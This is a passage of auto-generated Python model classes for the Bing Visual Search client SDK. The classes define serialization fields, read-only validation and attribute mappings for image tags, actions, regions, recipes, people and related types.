:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of queries related to the image.
:vartype data: ~visual_search_client.models.RelatedSearchesModule
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'RelatedSearchesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageRelatedSearchesAction, self).__init__(**kwargs)
self.data = None
class ImageShoppingSourcesAction(ImageAction):
"""Defines a shopping sources action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of merchants that offer items related to the image.
:vartype data: ~visual_search_client.models.AggregateOffer
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'AggregateOffer'},
}
def __init__(
self,
**kwargs
):
super(ImageShoppingSourcesAction, self).__init__(**kwargs)
self.data = None
class ImagesImageMetadata(msrest.serialization.Model):
"""Defines a count of the number of websites where you can shop or perform other actions related to the image.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar shopping_sources_count: The number of websites that sell the products seen in the image.
:vartype shopping_sources_count: int
:ivar recipe_sources_count: The number of websites that offer recipes of the food seen in the
image.
:vartype recipe_sources_count: int
:ivar aggregate_offer: A summary of the online offers of products found in the image. For
example, if the image is of a dress, the offer might identify the lowest price and the number
of offers found. Only visually similar products insights include this field. The offer includes
the following fields: Name, AggregateRating, OfferCount, and LowPrice.
:vartype aggregate_offer: ~visual_search_client.models.AggregateOffer
"""
_validation = {
'shopping_sources_count': {'readonly': True},
'recipe_sources_count': {'readonly': True},
'aggregate_offer': {'readonly': True},
}
_attribute_map = {
'shopping_sources_count': {'key': 'shoppingSourcesCount', 'type': 'int'},
'recipe_sources_count': {'key': 'recipeSourcesCount', 'type': 'int'},
'aggregate_offer': {'key': 'aggregateOffer', 'type': 'AggregateOffer'},
}
def __init__(
self,
**kwargs
):
super(ImagesImageMetadata, self).__init__(**kwargs)
self.shopping_sources_count = None
self.recipe_sources_count = None
self.aggregate_offer = None
class ImagesModule(msrest.serialization.Model):
"""Defines a list of images.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of images.
:vartype value: list[~visual_search_client.models.ImageObject]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ImageObject]'},
}
def __init__(
self,
**kwargs
):
super(ImagesModule, self).__init__(**kwargs)
self.value = None
class ImageTag(Thing):
"""A visual search tag.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar display_name: Display name for this tag. For the default tag, the display name is empty.
:vartype display_name: str
:ivar bounding_box: The bounding box for this tag. For the default tag, there is no bounding
box.
:vartype bounding_box: ~visual_search_client.models.ImageTagRegion
:ivar actions: Actions within this tag. The order of the items denotes the default ranking
order of these actions, with the first action being the most likely user intent.
:vartype actions: list[~visual_search_client.models.ImageAction]
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'display_name': {'readonly': True},
'bounding_box': {'readonly': True},
'actions': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'bounding_box': {'key': 'boundingBox', 'type': 'ImageTagRegion'},
'actions': {'key': 'actions', 'type': '[ImageAction]'},
}
def __init__(
self,
**kwargs
):
super(ImageTag, self).__init__(**kwargs)
self.display_name = None
self.bounding_box = None
self.actions = None
class ImageTagRegion(msrest.serialization.Model):
"""Defines an image region relevant to the ImageTag.
All required parameters must be populated in order to send to Azure.
:param query_rectangle: Required. A rectangle that outlines the area of interest for this tag.
:type query_rectangle: ~visual_search_client.models.NormalizedQuadrilateral
:param display_rectangle: Required. A recommended rectangle to show to the user.
:type display_rectangle: ~visual_search_client.models.NormalizedQuadrilateral
"""
_validation = {
'query_rectangle': {'required': True},
'display_rectangle': {'required': True},
}
_attribute_map = {
'query_rectangle': {'key': 'queryRectangle', 'type': 'NormalizedQuadrilateral'},
'display_rectangle': {'key': 'displayRectangle', 'type': 'NormalizedQuadrilateral'},
}
def __init__(
self,
**kwargs
):
super(ImageTagRegion, self).__init__(**kwargs)
self.query_rectangle = kwargs['query_rectangle']
self.display_rectangle = kwargs['display_rectangle']
class Intangible(Thing):
"""A utility class that serves as the umbrella for a number of 'intangible' things such as quantities, structured values, etc.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Intangible, self).__init__(**kwargs)
class KnowledgeRequest(msrest.serialization.Model):
"""A JSON object containing information about the request, such as filters for the resulting actions.
:param filters: A key-value object consisting of filters that may be specified to limit the
results returned by the API.
:type filters: ~visual_search_client.models.Filters
"""
_attribute_map = {
'filters': {'key': 'filters', 'type': 'Filters'},
}
def __init__(
self,
**kwargs
):
super(KnowledgeRequest, self).__init__(**kwargs)
self.filters = kwargs.get('filters', None)
class NormalizedQuadrilateral(Intangible):
"""Defines a region of an image. The region is a convex quadrilateral defined by coordinates of its top left, top right, bottom left, and bottom right points. The coordinates are fractional values of the original image's width and height in the range 0.0 through 1.0.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:param top_left: Required. The top left corner coordinate.
:type top_left: ~visual_search_client.models.Point2D
:param top_right: Required. The top right corner coordinate.
:type top_right: ~visual_search_client.models.Point2D
:param bottom_right: Required. The bottom right corner coordinate.
:type bottom_right: ~visual_search_client.models.Point2D
:param bottom_left: Required. The bottom left corner coordinate.
:type bottom_left: ~visual_search_client.models.Point2D
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'top_left': {'required': True},
'top_right': {'required': True},
'bottom_right': {'required': True},
'bottom_left': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'top_left': {'key': 'topLeft', 'type': 'Point2D'},
'top_right': {'key': 'topRight', 'type': 'Point2D'},
'bottom_right': {'key': 'bottomRight', 'type': 'Point2D'},
'bottom_left': {'key': 'bottomLeft', 'type': 'Point2D'},
}
def __init__(
self,
**kwargs
):
super(NormalizedQuadrilateral, self).__init__(**kwargs)
self.top_left = kwargs['top_left']
self.top_right = kwargs['top_right']
self.bottom_right = kwargs['bottom_right']
self.bottom_left = kwargs['bottom_left']
class Organization(Thing):
"""Defines an organization.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Organization, self).__init__(**kwargs)
class PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema(msrest.serialization.Model):
"""PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema.
:param visual_search: The form data is a JSON object that identifies the image using an
insights token or URL to the image. The object may also include an optional crop area that
identifies an area of interest in the image. The insights token and URL are mutually exclusive
– do not specify both. You may specify knowledgeRequest form data and image form data in the
same request only if knowledgeRequest form data specifies the cropArea field only (it must not
include an insights token or URL).
:type visual_search: str
:param image: The form data is an image binary. The Content-Disposition header's name parameter
must be set to "image". You must specify an image binary if you do not use knowledgeRequest
form data to specify the image; you may not use both forms to specify an image. You may specify
knowledgeRequest form data and image form data in the same request only if knowledgeRequest
form data specifies the cropArea field only (it must not include an insights token or URL).
:type image: IO
"""
_attribute_map = {
'visual_search': {'key': 'knowledgeRequest', 'type': 'str'},
'image': {'key': 'image', 'type': 'IO'},
}
def __init__(
self,
**kwargs
):
super(PathsPsg33EImagesVisualsearchPostRequestbodyContentMultipartFormDataSchema, self).__init__(**kwargs)
self.visual_search = kwargs.get('visual_search', None)
self.image = kwargs.get('image', None)
class Person(Thing):
"""Defines a person.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar job_title: The person's job title.
:vartype job_title: str
:ivar twitter_profile: The URL of the person's twitter profile.
:vartype twitter_profile: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'job_title': {'readonly': True},
'twitter_profile': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'job_title': {'key': 'jobTitle', 'type': 'str'},
'twitter_profile': {'key': 'twitterProfile', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Person, self).__init__(**kwargs)
self.job_title = None
self.twitter_profile = None
class Point2D(Intangible):
"""Defines a 2D point with X and Y coordinates.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:param x: Required. The x-coordinate of the point.
:type x: float
:param y: Required. The y-coordinate of the point.
:type y: float
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'x': {'key': 'x', 'type': 'float'},
'y': {'key': 'y', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(Point2D, self).__init__(**kwargs)
self.x = kwargs['x']
self.y = kwargs['y']
class Query(msrest.serialization.Model):
"""Defines a search query.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param text: Required. The query string. Use this string as the query term in a new search
request.
:type text: str
:ivar display_text: The display version of the query term.
:vartype display_text: str
:ivar web_search_url: The URL that takes the user to the Bing search results page for the
query.
:vartype web_search_url: str
:ivar search_link: The URL that you use to get the results of the related search. Before using
the URL, you must append query parameters as appropriate and include the Ocp-Apim-Subscription-
Key header. Use this URL if you're displaying the results in your own user interface.
Otherwise, use the webSearchUrl URL.
:vartype search_link: str
:ivar thumbnail: The URL to a thumbnail of a related image.
:vartype thumbnail: ~visual_search_client.models.ImageObject
"""
_validation = {
'text': {'required': True},
'display_text': {'readonly': True},
'web_search_url': {'readonly': True},
'search_link': {'readonly': True},
'thumbnail': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'display_text': {'key': 'displayText', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'search_link': {'key': 'searchLink', 'type': 'str'},
'thumbnail': {'key': 'thumbnail', 'type': 'ImageObject'},
}
def __init__(
self,
**kwargs
):
super(Query, self).__init__(**kwargs)
self.text = kwargs['text']
self.display_text = None
self.web_search_url = None
self.search_link = None
self.thumbnail = None
class Recipe(CreativeWork):
"""Defines a cooking recipe.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar cook_time: The amount of time the food takes to cook. For example, PT25M. For information
about the time format, see http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype cook_time: str
:ivar prep_time: The amount of time required to prepare the ingredients. For example, PT15M.
For information about the time format, see http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype prep_time: str
:ivar total_time: The total amount of time it takes to prepare and cook the recipe. For
example, PT45M. For information about the time format, see
http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype total_time: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'cook_time': {'readonly': True},
'prep_time': {'readonly': True},
'total_time': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'cook_time': {'key': 'cookTime', 'type': 'str'},
'prep_time': {'key': 'prepTime', 'type': 'str'},
'total_time': {'key': 'totalTime', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Recipe, self).__init__(**kwargs)
self.cook_time = None
self.prep_time = None
self.total_time = None
class RecipesModule(msrest.serialization.Model):
"""Defines a list of recipes.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of recipes.
:vartype value: list[~visual_search_client.models.Recipe]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Recipe]'},
}
def __init__(
self,
**kwargs
):
super(RecipesModule, self).__init__(**kwargs)
self.value = None
class RelatedSearchesModule(msrest.serialization.Model):
"""Defines a list of related searches.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of related searches.
:vartype value: list[~visual_search_client.models.Query]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Query]'},
}
def __init__(
self,
**kwargs
):
super(RelatedSearchesModule, self).__init__(**kwargs)
self.value = None
class StructuredValue(Thing):
"""StructuredValue.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StructuredValue, self).__init__(**kwargs)
class VisualSearchRequest(msrest.serialization.Model):
"""A JSON object that contains information about the image to get insights of. Specify this object only in a knowledgeRequest form data.
